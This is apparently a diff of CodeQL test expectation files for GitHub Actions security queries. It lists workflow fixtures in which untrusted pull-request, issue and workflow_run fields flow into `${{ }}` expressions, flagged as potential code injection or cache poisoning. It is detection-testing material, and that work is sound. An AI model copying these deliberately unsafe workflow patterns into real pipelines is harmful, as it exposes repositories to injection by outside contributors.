| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected index 5c5c26edb4e5..9cfac091f675 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected @@ -7,4 +7,4 @@ nodes | .github/workflows/neg_code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning ($@). | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/code_injection1.yml:2:3:2:15 | issue_comment | issue_comment | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected index cc5ce9bdf874..6b1a3e873134 100644 
--- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected 
@@ -44,10 +44,10 @@ edges
 | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step |
 | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step |
 #select
-| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. |
-| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. |
-| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. |
-| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. |
-| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
|
-| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. |
